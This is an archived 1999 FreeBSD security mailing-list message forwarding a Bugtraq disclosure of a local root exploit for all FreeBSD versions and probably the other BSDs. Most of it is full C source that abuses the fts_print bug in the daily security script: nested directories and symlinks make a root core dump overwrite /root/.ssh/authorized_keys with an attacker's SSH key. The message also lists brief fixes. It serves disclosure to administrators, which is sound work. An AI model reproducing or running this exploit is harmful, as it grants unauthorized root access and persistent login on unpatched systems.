Date: Thu, 26 Aug 1999 12:45:37 -0400 From: Forrest Aldrich <forrie@forrie.com> To: freebsd-security@freebsd.org Subject: Fwd: FreeBSD (and other BSDs?) local root explot Message-ID: <4.2.0.58.19990826124527.00aa85b0@216.67.12.69>
next in thread | raw e-mail | index | archive | help
>Approved-By: aleph1@SECURITYFOCUS.COM
>Delivered-To: bugtraq@securityfocus.com
>X-Mailer: XFMail 1.3 [p0] on Linux
>X-SMS: +48601383657@text.plusgsm.pl
>X-PGP: PGP key on WWW or finger
>X-Operating-System: FreeBSD 3.2-STABLE (i386)
>Date: Tue, 24 Aug 1999 23:47:05 +0200
>Reply-To: Przemyslaw Frasunek <secure@FREEBSD.LUBLIN.PL>
>Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
>From: Przemyslaw Frasunek <secure@FREEBSD.LUBLIN.PL>
>Organization: Lubelska Grupa Uzytkownikow BSD
>Subject: FreeBSD (and other BSDs?) local root explot
>X-To: bugtraq@securityfocus.com
>To: BUGTRAQ@SECURITYFOCUS.COM
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>/*
>
> (c) 1999 babcia padlina ltd. <babunia@FreeBSD.lublin.pl>
>
> bug in fts_print function allows to overwrite any file in system, when
> running /etc/security script (executed from 'daily' scripts).
>
> affected systems:
> - freebsd (all versions)
> - probably openbsd/netbsd
>
> fix:
> - limit root's coredump size
> - patch libc
>
>*/
>
>#include <stdio.h>
>#include <errno.h>
>#include <sys/stat.h>
>#include <strings.h>
>#include <unistd.h>
>
>#define STRING "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n"
>#define FILE "/root/.ssh/authorized_keys"
>#define CORE "find.core"
>#define DEPTH 300
>#define BUFSIZE 250
>
>int makedir(dir, linkfrom, linkto)
>char *dir, *linkfrom, *linkto;
>{
>
> if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))
> return -1;
>
> if (chdir(dir))
> return -1;
>
> if (symlink(linkfrom, linkto) < 0)
> return -1;
>
> return 0;
>}
>
>
>int main(argc, argv)
>int argc;
>char **argv;
>{
> int i = 0;
> char pid[10], buf[BUFSIZE];
>
> sprintf(pid, "%d", getpid());
>
> if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO)))
> {
> perror("mkdir()");
> return -1;
> }
>
> if (chdir(pid))
> {
> perror("chdir()");
> return -1;
> }
>
> bzero(buf, BUFSIZE);
> memset(buf, 0x41, BUFSIZE-1);
>
> for(i=0;i<DEPTH;i++)
> {
> if (makedir(STRING, FILE, CORE) < 0)
> {
> perror("makedir()");
> return -1;
> }
>
> if(makedir(buf, FILE, CORE) < 0)
> {
> perror("makedir()");
> return -1;
> }
> }
>
> return 0;
>}
>
>- ---
>* Fido: 2:480/124 ** WWW: FreeBSD.lublin.pl/~venglin ** GSM: +48-601-383657 *
>* Inet: venglin@FreeBSD.lublin.pl ** PGP: D48684904685DF43 EA93AFA13BE170BF *
>
>-----BEGIN PGP SIGNATURE-----
>Version: PGPfreeware 5.0i for non-commercial use
>Charset: noconv
>
>iQA/AwUBN8MS2P6SPyHAYTvjEQLK5ACfZ1cVpjGzqIF3bTsIX/wrahJOqy4AoOEx
>JkgnTo+Dk3QUFGT2bZdmxx9S
>=Tyvh
>-----END PGP SIGNATURE-----
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?4.2.0.58.19990826124527.00aa85b0>